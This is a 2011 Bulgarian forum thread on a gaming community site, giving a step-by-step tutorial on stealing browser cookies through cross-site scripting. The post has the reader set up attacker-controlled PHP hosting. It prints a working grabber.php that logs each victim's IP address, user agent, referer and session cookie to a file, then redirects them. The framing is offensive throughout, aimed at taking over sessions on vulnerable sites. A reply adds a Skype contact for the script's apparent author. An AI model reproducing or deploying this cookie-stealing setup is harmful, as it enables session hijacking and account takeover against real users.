2GOOD4U
2GOOD4U 1.6 Server's iP
cs.ko.tl:27015 Dust2
cs.ko.tl:27016 Aim
cs.ko.tl:27017 Awp
cs.ko.tl:27018 Italy2
cs.ko.tl:27019 5on5 #1

Как се взимат cookies чрез XSS?!

Go down

Важна тема Как се взимат cookies чрез XSS?!

Писане by hARDCORE on Пон Апр 25, 2011 9:27 am

Здравейте отново! В преден урок бях убяснил какво е XSS:

Cross-site
scripting (XSS) е вид уязвимост в компютърната сигурност която се
намира в уеб приложенията. Тя позволява на атакуващия сървара да
използва зловреден код. Този код може да се ползва за много неща като
примерно взимане на сесий или bypass на контролирана страница (priv8).


За придобиване на достъп в сайт който има допусната уязвимост XSS ще Ви е нужно да имате 2 неща:
1. Сайт който е уязвим към XSS!
2. Поддържащ php хостинг [You must be registered and logged in to see this image.]


Сега се регистрирайте в някой хостинг! След като влезнете в File Manager-a направете един php файл с име по Ваша преценка! [You must be registered and logged in to see this image.]
cookie.php
Код:


Cookie Stealer


COOKIES STEALTHER


by Scr!pt3r XSSecurity Crew


 



Cookie Stealer



COOKIES STEALTHER

by Scr!pt3r XSSecurity Crew





Този файл cookie.php се използва за да виждаме откраднатите cookies.

Сега създаваме още един php файл който ще краде самите cookies:

grabber.php

Код: [You must be registered and logged in to see this link.]$ip = $_SERVER['REMOTE_ADDR'];
$refferer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET[c];
$time = date("Y-m-d G:i:s A");
$text
= "

".$time." = ".$ip."

User
Agent: ".$agent."
Referer: ".$referer."
Session:
".$data."


";
$file = fopen('log.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: [You must be registered and logged in to see this link.]
?>

Този код ще взима информация за жертвата!

След пренасочването към [You must be registered and logged in to see this link.] ще се запишат cookies за този сайт!
avatar
hARDCORE
Power user

Male Zodiac : Sagittarius Брой мнения : 297
Отсенка : 1337
Rep : 10
Регистриран на : 13.01.2010
Age : 21
Местожителство : PLOVDIV

точки
точки:
652/1000  (652/1000)

Вижте профила на потребителя http://bginter.bulgarianforum.net

Върнете се в началото Go down

Важна тема Re: Как се взимат cookies чрез XSS?!

Писане by Scr!pt3r on Сря Май 04, 2011 7:38 pm

Много известен съм станал! пиши ми в скайп script3r_xssecurity

Scr!pt3r
Статист

Брой мнения : 2
Отсенка : 2
Rep : 0
Регистриран на : 04.05.2011

Вижте профила на потребителя

Върнете се в началото Go down

Върнете се в началото


 
Права за този форум:
Не Можете да отговаряте на темите